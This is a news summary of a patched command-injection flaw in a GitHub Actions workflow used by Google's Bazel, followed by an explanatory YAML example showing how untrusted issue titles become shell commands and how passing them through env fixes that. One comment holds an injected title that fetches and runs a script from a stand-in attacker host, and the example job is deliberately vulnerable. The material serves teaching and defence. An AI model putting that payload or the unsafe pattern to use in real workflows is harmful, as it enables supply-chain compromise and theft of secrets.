"Google Supply Chain Bug Patched in Code-Testing Tool Bazel"

A critical supply chain vulnerability in Bazel, Google's open-source build and test tool, could have allowed attackers to insert malicious code. The command injection flaw put at risk the security of millions of Bazel-dependent projects, including Kubernetes, Angular, Uber, LinkedIn, Databricks, Dropbox, Nvidia, and Google itself. Researchers at Cycode discovered the flaw in November 2023, and Google fixed it within seven days. The Cycode Research Team found that a GitHub Actions workflow in the Bazel repository could be hijacked through a command injection vulnerability in one of the custom Actions the workflow depends on: attacker-controlled input was interpolated into a shell command without being treated as data. The flaw therefore had a direct impact on the software supply chain, potentially enabling malicious actors to insert harmful code into the Bazel codebase, plant a backdoor, and disrupt the production environments of anyone using Bazel. This article continues to discuss the critical supply chain bug in Bazel.
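The summary above does not show which workflow or input was affected, so the following is an added, generic illustration of the vulnerability class (GitHub Actions command injection through expression interpolation) and is not Bazel's workflow or Cycode's proof of concept. The workflow name, the `issues` trigger and the use of the issue title are assumptions chosen for the example; any event field an outside user controls (issue or PR title and body, branch name, commit message) behaves the same way.

```yaml
# Added example, not from the Bazel repository.
# Demonstrates the unsafe and the safe way to use untrusted event data in a run step.
name: triage-example            # assumed workflow name
on:
  issues:
    types: [opened]

permissions:
  contents: read                # least privilege: the job needs no write access

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # UNSAFE: ${{ ... }} is expanded into the script text *before* the shell
      # runs it. An issue opened with the title
      #   x"; curl -s https://attacker.example/p | sh; echo "
      # turns this single echo into several commands that run with the job's
      # GITHUB_TOKEN and any secrets the job can reach.
      - name: Echo title (vulnerable)
        run: echo "Triaging issue: ${{ github.event.issue.title }}"

  hardened:
    runs-on: ubuntu-latest
    steps:
      # SAFE: the expression is evaluated when the env block is built and the
      # shell only ever sees the value as the contents of a variable, so quotes
      # and semicolons in the title cannot change the command that runs.
      - name: Echo title (hardened)
        env:
          ISSUE_TITLE: ${{ github.event.issue.title }}
        run: echo "Triaging issue: $ISSUE_TITLE"
```

The same rule applies inside a reusable or composite action: a `run:` step that splices `${{ inputs.some_input }}` directly into its script is injectable by whatever workflow input the caller forwards from an event, which is the shape of flaw the article attributes to one of Bazel's dependent Actions. Passing the input through `env:` and quoting the variable in the script closes it.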

SC Magazine reports "Google Supply Chain Bug Patched in Code-Testing Tool Bazel"

Submitted by grigby1